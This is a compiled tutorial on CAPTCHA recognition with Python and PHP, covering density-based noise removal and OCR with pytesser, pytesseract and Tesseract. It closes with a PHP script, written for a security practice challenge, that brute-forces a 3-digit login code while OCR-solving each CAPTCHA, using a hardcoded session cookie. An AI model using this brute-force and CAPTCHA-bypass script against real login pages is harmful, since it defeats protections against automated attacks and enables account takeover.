Some thoughts on CAPTCHA recognition with Python

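Searching Baidu for "python" plus "验证码" (CAPTCHA) turns up many articles on CAPTCHA recognition. Skimming them, the main approaches fall into a few groups: one processes the image and then matches it against font-library features; one processes the image and builds a dictionary that maps glyphs to characters; and one feeds the image directly to an OCR module. Whichever approach is used, the image has to be processed first, so I tried analyzing one such CAPTCHA.
I. Image processing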
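
As a rough illustration of the second family of approaches (a dictionary that maps known glyph bitmaps to characters), here is a minimal sketch. It is not taken from any of the articles mentioned: the tiny 3x3 `TEMPLATES` bitmaps and the helper names `hamming` and `match_char` are invented for the example, and a real CAPTCHA would first need its characters segmented and scaled to a common size.

```python
# Hypothetical 3x3 binary templates (1 = ink, 0 = background), for illustration only.
TEMPLATES = {
    "I": (0, 1, 0,
          0, 1, 0,
          0, 1, 0),
    "L": (1, 0, 0,
          1, 0, 0,
          1, 1, 1),
    "T": (1, 1, 1,
          0, 1, 0,
          0, 1, 0),
}


def hamming(a, b):
    """Count the positions where two equally sized bitmaps differ."""
    if len(a) != len(b):
        raise ValueError("bitmaps must have the same size")
    return sum(1 for p, q in zip(a, b) if p != q)


def match_char(glyph, templates=TEMPLATES):
    """Return the template character with the smallest Hamming distance to glyph."""
    return min(templates, key=lambda ch: hamming(glyph, templates[ch]))


# An "L" with one noisy pixel is still closest to the "L" template.
noisy_l = (1, 0, 0,
           1, 0, 1,
           1, 1, 1)
print(match_char(noisy_l))
```

Nearest-template matching like this tolerates a few flipped pixels, but it is sensitive to rotation and distortion, which is one reason the image has to be cleaned up first.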

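The main source of interference in this CAPTCHA is the curve running through the middle, so the first step is to remove it. I considered two algorithms: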

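The first starts by locating the head of the curve, that is, the position of the black pixel at x=0. It then advances x, looks at the black pixels in each column, and checks the distance between two neighbouring black points; if the distance falls within a certain range, the point is most likely on the curve. Finally, all points on the curve are painted white. I tried this and the result was mediocre: the curve is not removed completely, and strokes of the characters are easily removed along with it.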
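
The curve-tracing idea can be sketched roughly as follows. This is only an illustration on a plain list of pixel rows rather than a PIL image; the function names and the `max_jump` threshold are assumptions made for the example, not the code that was actually tried.

```python
WHITE, BLACK = 255, 0


def trace_curve(pixels, max_jump=1):
    """Follow a thin curve from x=0 and return the (x, y) points judged to be on it.

    pixels is a list of rows, each a list of 0 (black) / 255 (white) values.
    max_jump is an assumed threshold: how far the curve may move vertically
    between two neighbouring columns.
    """
    height, width = len(pixels), len(pixels[0])
    # Starting point: the first black pixel in column x = 0.
    start = [y for y in range(height) if pixels[y][0] == BLACK]
    if not start:
        return []
    prev_y = start[0]
    points = [(0, prev_y)]
    for x in range(1, width):
        # Black pixels in this column that are close enough to the previous point.
        near = [y for y in range(height)
                if pixels[y][x] == BLACK and abs(y - prev_y) <= max_jump]
        if not near:
            break  # the curve is lost; stop rather than guess
        prev_y = min(near, key=lambda y: abs(y - prev_y))
        points.append((x, prev_y))
    return points


def erase_points(pixels, points):
    """Paint the given points white, in place."""
    for x, y in points:
        pixels[y][x] = WHITE


# A 5x4 toy image containing only a gently descending curve.
rows = [
    [255, 255, 255, 255, 255],
    [0,   0,   255, 255, 255],
    [255, 255, 0,   0,   255],
    [255, 255, 255, 255, 0],
]
curve = trace_curve(rows)
erase_points(rows, curve)
```

The sketch also shows where the weakness comes from: wherever the curve crosses a character, the stroke pixels near the previous point are indistinguishable from curve pixels and get erased too.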

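The second uses the density of points per unit area. It first counts the points in each unit area and clears any area that has fewer points than a given threshold; what remains is essentially the characters. In this example, for convenience, I used 5*5 blocks as the unit area and tuned the density threshold to 11 points per block.
[Figure: result after processing]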
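
To experiment with the block size and threshold without any image files, the density rule can be tried on a plain list of pixel rows. This is a small sketch under that assumption; `density_filter` and its parameter names are made up for the example, and the defaults simply mirror the 5*5 block and threshold of 11 mentioned above.

```python
WHITE = 255


def density_filter(pixels, block=5, min_points=11):
    """Whiten every block x block tile that holds fewer than min_points non-white pixels.

    pixels is a list of rows of 0 (black) / 255 (white) values and is edited in place.
    Tiles at the right and bottom edges are clipped to the image bounds.
    """
    height, width = len(pixels), len(pixels[0])
    for top in range(0, height, block):
        for left in range(0, width, block):
            ys = range(top, min(top + block, height))
            xs = range(left, min(left + block, width))
            count = sum(1 for y in ys for x in xs if pixels[y][x] != WHITE)
            if count < min_points:
                for y in ys:
                    for x in xs:
                        pixels[y][x] = WHITE
    return pixels


# Toy 4x2 image: the left 2x2 tile is dense (part of a character),
# the right tile holds a single stray pixel (part of the curve).
grid = [
    [0, 0, 255, 0],
    [0, 0, 255, 255],
]
density_filter(grid, block=2, min_points=3)
```

With `block=2` and `min_points=3` the dense tile survives and the stray pixel is cleared. On a real CAPTCHA both values need tuning by eye, since a thick curve or a thin stroke can land on the wrong side of the threshold.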

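II. Character recognition
Here I used pytesser for OCR, but because the characters in this kind of CAPTCHA are irregular, the recognition accuracy is not very high. If anyone more experienced knows a better approach, I would appreciate some pointers.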
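III. Preparation and code example
1. PIL, pytesser, tesseract
(1) Install PIL. Download: http://www.pythonware.com/products/pil/
(2) pytesser. Download: http://code.google.com/p/pytesser/. After downloading, unzip it into the same folder as your code and it is ready to use.
(3) Tesseract OCR engine. Download: http://code.google.com/p/tesseract-ocr/. After downloading, unzip it, find the tessdata folder, and use it to replace the tessdata folder that came with pytesser.
2. The code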

# encoding=utf-8
# Noise removal based on point density
import Image, ImageEnhance, ImageFilter
from pytesser import *

# Count the non-white points in an image
def numpoint(im):
    w, h = im.size
    data = list(im.getdata())
    count = 0
    for x in range(w):
        for y in range(h):
            if data[y * w + x] != 255:  # 255 is white
                count += 1
    return count

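# Whiten every 5*5 block whose point density is too low
def pointmidu(im):
    w, h = im.size
    for y in range(0, h, 5):
        for x in range(0, w, 5):
            # Clip the block to the image so that edge blocks are not padded
            # by crop() and putpixel() never gets out-of-range coordinates.
            x2, y2 = min(x + 5, w), min(y + 5, h)
            im1 = im.crop((x, y, x2, y2))
            a = numpoint(im1)
            if a < 11:  # fewer than 11 points in the block: paint the whole block white
                for i in range(x, x2):
                    for j in range(y, y2):
                        im.putpixel((i, j), 255)
    im.save(r'img.jpg')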

# Run OCR on the cleaned-up image
def ocrend():
    image_name = "img.jpg"
    im = Image.open(image_name)
    im = im.filter(ImageFilter.MedianFilter())
    enhancer = ImageEnhance.Contrast(im)
    im = enhancer.enhance(2)
    im = im.convert('1')
    im.save("1.tif")
    print image_file_to_string('1.tif')

if __name__=='__main__':
    image_name = "1.png"
    im = Image.open(image_name)
    im = im.filter(ImageFilter.DETAIL)
    im = im.filter(ImageFilter.MedianFilter())

    enhancer = ImageEnhance.Contrast(im)
    im = enhancer.enhance(2)
    im = im.convert('1')
    ##a=remove_point(im)
    pointmidu(im)
    ocrend()

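(I) Using pytesser

1. Download and install PIL

Download: http://www.pythonware.com/products/pil/

Run the installer.

2. Download and install pytesser

Download: http://code.google.com/p/pytesser/

Unzip it to "...\pytesser", then add "...\pytesser" to the PYTHONPATH environment variable.

3. Running the program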

import os
import pytesser

os.chdir("E:/software/python/pytesser")
pytesser.image_file_to_string('c:/check.bmp')

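Reference: http://code.google.com/p/pytesser/

Note: this project appears to be just a thin Python wrapper around tesseract-ocr. It also seems to have stayed at version 0.01 without updates, and the wrapper appears to have some fairly serious bugs. For a more thorough solution, refer to tesseract-ocr itself: http://code.google.com/p/tesseract-ocr/.

4. Fixing the limitation that the program can only be called from the pytesser directory

Add a new file, mypytesser.py, in that directory: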

import os
import pytesser

def image_file_to_string(file):
    # Remember the caller's directory, switch to pytesser's, and always switch back
    cwd = os.getcwd()
    try:
        os.chdir(r"E:\software\python\pytesser")
        return pytesser.image_file_to_string(file)
    finally:
        os.chdir(cwd)

Then parse an image from the command line with the following commands:

import mypytesser
print mypytesser.image_file_to_string("c:/check.bmp")
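
The same save-and-restore pattern used in mypytesser.py can be written once as a reusable context manager. This is a sketch using only the standard library; the name `working_directory` is an assumption made for the example, and the pytesser call in the comment is shown only to indicate where it would go.

```python
import contextlib
import os


@contextlib.contextmanager
def working_directory(path):
    """Temporarily switch the current working directory, restoring it afterwards."""
    previous = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        # Runs even if the body raises, just like the try/finally in mypytesser.py.
        os.chdir(previous)


# Intended use (paths as in the example above):
# with working_directory("E:/software/python/pytesser"):
#     text = pytesser.image_file_to_string("c:/check.bmp")
```

Compared with a dedicated wrapper module, this keeps the directory handling separate from the OCR call, so it can be reused for any tool that insists on running from its own folder.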

(II) Writing your own code

http://blog.feshine.net/technology/1163.html

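(III) tesseract-ocr basics

1. Basic usage

cmd>tesseract c:\check1.bmp c:\check1

The program's feedback can be seen in tesseract.log, but it does not tell you much; you need to dig deeper into the tesseract project.

2. A very common problem is that Tesseract reports an error when opening the image file. The image's DPI needs to be changed to 200*200, which can be done in Python: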

>>> import Image
>>> image = Image.open(r"c:\check.bmp")
>>> image.save(r"c:\check1.bmp", dpi=(200, 200))
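
The basic `tesseract <image> <outputbase>` command from step 1 can also be driven from Python with the standard `subprocess` module. This is a minimal sketch: the helper names are invented for the example, and it assumes a `tesseract` executable is on the PATH and that it writes its result to `<outputbase>.txt`, as the command above does.

```python
import subprocess


def build_tesseract_command(image_path, output_base, executable="tesseract"):
    """Build the argument list for `tesseract <image> <outputbase>`."""
    return [executable, image_path, output_base]


def run_tesseract(image_path, output_base, executable="tesseract"):
    """Run Tesseract and return the recognised text (needs Tesseract installed)."""
    subprocess.check_call(build_tesseract_command(image_path, output_base, executable))
    # Tesseract appends ".txt" to the output base name itself.
    with open(output_base + ".txt") as handle:
        return handle.read().strip()


print(build_tesseract_command(r"c:\check1.bmp", r"c:\check1"))
```

Passing the arguments as a list avoids quoting problems with paths that contain spaces, such as an install under "Program Files".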

PyTesser, a CAPTCHA recognition library for Python

PyTesser

PyTesser is an Optical Character Recognition module for Python. It takes as input an image or image file and outputs a string.

PyTesser uses the Tesseract OCR engine, converting images to an accepted format and calling the Tesseract executable as an external script. A Windows executable is provided along with the Python scripts. The scripts should work in other operating systems as well.

Dependencies

PIL is required to work with images in memory. PyTesser has been tested with Python 2.4 in Windows XP.

Usage Example

>>> from pytesser import *
>>> image = Image.open('fnord.tif')  # Open image object using PIL
>>> print image_to_string(image)     # Run tesseract.exe on image
fnord
>>> print image_file_to_string('fnord.tif')
fnord

(more examples in README)

pytesser download:

http://code.google.com/p/pytesser/

Tesseract OCR engine download:

http://code.google.com/p/tesseract-ocr/

PIL official download:

http://www.pythonware.com/products/pil/

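I have recently been working through the challenges on 网络信息安全攻防学习平台 (a network security attack-and-defense learning platform) and found that some of them actually require CAPTCHA recognition. I had always thought of this as something advanced and never looked into it, so this time I spent a little while studying it. It is only the basics, of course, since I don't know the advanced material, but I'll share what I learned.

I implemented the CAPTCHA recognition in Python this time. Python turned out to be very capable, but installing the recognition libraries raised a few small problems.

For Python CAPTCHA recognition, the libraries most often covered online are pytesser and pytesseract. Installing pytesser is a bit of a hassle, so I skip it here and use pytesseract directly.

Installing the Python CAPTCHA recognition libraries

To install pytesseract, you first need its dependencies, PIL and tesseract-ocr. PIL is an image-processing library, and tesseract-ocr is Google's OCR engine.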

1. PIL downloads:

PIL-1.1.7.win-amd64-py2.7.exe

PIL-1.1.7.win32-py2.7.exe

Alternatively, use Pillow instead; usage is essentially the same.

http://www.lfd.uci.edu/~gohlke/pythonlibs/#pillow

2. tesseract-ocr download:

tesseract-ocr-setup-3.02.02.exe

3. Installing pytesseract

Just run pip install pytesseract, or use easy_install pytesseract.

CAPTCHA recognition in Python

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Date: 2014/11/27
# Created by 独自等待
# Blog: http://www.waitalone.cn/
try:
    import pytesseract
    from PIL import Image
except ImportError:
    print 'Module import failed. Install with pip; pytesseract depends on the following:'
    print 'http://www.lfd.uci.edu/~gohlke/pythonlibs/#pil'
    print 'http://code.google.com/p/tesseract-ocr/'
    raise SystemExit

image = Image.open('vcode.png')
vcode = pytesseract.image_to_string(image)
print vcode

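The recognition rate is quite high, though that also depends on the CAPTCHA itself: this one was designed to be fairly easy to recognize.

Recognizing CAPTCHAs with Python really is that simple, so give it a try.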
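
Raw OCR output often contains stray spaces or a trailing newline, so it is worth cleaning before use. The sketch below mirrors, in Python, the cleanup that the PHP `mkvcode()` function later in this post performs (trim, drop spaces, accept only 4 characters). The name `clean_vcode` and the choice to return `None` on failure are assumptions made for the example.

```python
def clean_vcode(raw, expected_length=4):
    """Strip all whitespace from OCR output and check its length.

    Returns the cleaned text, or None when it is not expected_length
    characters long, so the caller can fetch a fresh CAPTCHA and retry.
    """
    cleaned = "".join(raw.split())
    return cleaned if len(cleaned) == expected_length else None


print(clean_vcode(" 3 8 1 4\n"))  # 3814
print(clean_vcode("38l"))         # None
```

A length check like this cannot tell whether the characters are right, only that the result has a plausible shape; a wrong 4-character guess still has to be rejected by the server.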

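CAPTCHA recognition in PHP

I have not looked into CAPTCHA recognition in PHP in depth, but after implementing it in Python it became clear that all you need is an OCR engine. Here is the code I used earlier for level 9 of the scripting challenges.

For worked examples of CAPTCHA recognition and cracking implemented in Python, see:

http://www.waitalone.cn/security-scripts-game.html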

<?php
/**
 * Created by 独自等待
 * Date: 2014/11/20
 * Time: 9:27
 * Name: ocr.php
 * 独自等待's blog: http://www.waitalone.cn/
 */
error_reporting(7);
if (!extension_loaded('curl')) exit('Please enable the cURL extension.');
crack_key();

function crack_key()
{
    $crack_url = 'http://1.hacklist.sinaapp.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php';
    for ($i = 100; $i <= 999; $i++) {
        $vcode = mkvcode();
        $post_data = array(
            'username' => 13388886666,
            'mobi_code' => $i,
            'user_code' => $vcode,
            'Login' => 'submit'
        );
        $response = send_pack('POST', $crack_url, $post_data);
        // strpos() returns 0 for a match at offset 0, so compare with false explicitly
        if (strpos($response, 'error') === false) {
            system('cls');
            echo $response;
            break;
        } else {
            echo $response . "\n";
        }
    }
}


// Download a CAPTCHA image and recognize it with Tesseract
function mkvcode()
{
    $vcode = '';
    $vcode_url = "http://1.hacklist.sinaapp.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php";
    $pic = send_pack('GET', $vcode_url);
    file_put_contents('vcode.png', $pic);
    $cmd = "\"D:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe\" vcode.png vcode";
    system($cmd);
    if (file_exists('vcode.txt')) {
        $vcode = file_get_contents('vcode.txt');
        $vcode = trim($vcode);
        $vcode = str_replace(' ', '', $vcode);
    }
    // Accept only 4-character results; otherwise fetch a new CAPTCHA and retry
    if (strlen($vcode) == 4) {
        return $vcode;
    } else {
        return mkvcode();
    }
}

// Send an HTTP request with cURL and return the response body
function send_pack($method, $url, $post_data = array())
{
    $cookie = 'saeut=218.108.135.246.1416190347811282;PHPSESSID=6eac12ef61de5649b9bfd8712b0f09c2';
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    if ($method == 'POST') {
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
}


